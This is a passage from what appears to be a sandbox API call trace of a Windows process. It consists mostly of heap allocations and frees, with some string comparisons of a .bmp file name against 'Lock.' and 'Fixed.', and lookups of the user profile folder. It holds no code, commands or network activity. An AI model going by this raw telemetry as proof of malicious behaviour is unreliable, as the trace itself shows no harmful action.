(lpFileName="C:\\Users\\FD1HVy\\Pictures\\FS3WVwrvnLekT9.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\fs3wvwrvnlekt9.jpg")) returned 0xffffffff [0210.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0210.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0210.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0210.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.155] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0210.155] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.155] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0210.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0210.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0210.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0210.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0210.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0210.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0210.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0210.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0210.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0210.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G_BhwPRnGbbQ-dfc.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_BhwPRnGbbQ-dfc.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BhwPRnGbbQ-dfc.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hwPRnGbbQ-dfc.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wPRnGbbQ-dfc.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PRnGbbQ-dfc.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RnGbbQ-dfc.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nGbbQ-dfc.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GbbQ-dfc.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bbQ-dfc.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bQ-dfc.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q-dfc.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-dfc.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dfc.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fc.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0210.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0210.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0210.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0210.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0210.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0210.157] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0210.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0210.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0210.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0210.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0210.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0210.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0210.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0210.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2a) returned 0x2aa6760 [0210.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0210.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G_BhwPRnGbbQ-dfc.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_BhwPRnGbbQ-dfc.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0210.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BhwPRnGbbQ-dfc.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0210.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hwPRnGbbQ-dfc.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wPRnGbbQ-dfc.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PRnGbbQ-dfc.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RnGbbQ-dfc.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nGbbQ-dfc.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GbbQ-dfc.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bbQ-dfc.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0210.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bQ-dfc.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0210.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q-dfc.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-dfc.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0210.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dfc.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0210.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fc.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0210.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6300 [0210.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0210.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6300 | out: hHeap=0x2af0000) returned 1 [0210.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0210.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0210.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0210.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0210.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0210.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69a00 | out: hHeap=0x2af0000) returned 1 [0210.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0210.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0210.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0210.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0210.159] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0210.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0210.159] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0210.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0210.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0210.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719a8 [0210.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0210.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0210.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0210.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0210.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0210.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0210.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0210.159] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0210.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0210.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa570 [0210.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6a8 [0210.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0210.160] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0210.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0210.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0210.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0210.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0210.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0210.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0210.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0210.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0210.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0210.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0210.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0210.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0210.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0210.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0210.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0210.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0210.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0210.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0210.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0210.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0210.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0210.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0210.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0210.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b78 [0210.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0210.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0210.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0210.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0210.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0210.161] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0210.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6d8 [0210.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0210.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0210.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5d0 [0210.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.161] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0210.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0210.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0210.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0210.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0210.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0210.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0210.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0210.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0210.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0210.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 [0210.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0210.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0210.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0210.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0210.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0210.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719b8 [0210.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0210.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0210.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a48 [0210.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7c8 [0210.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0210.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0210.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0210.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0210.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0210.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0210.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0210.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.163] RtlAllocateHeap 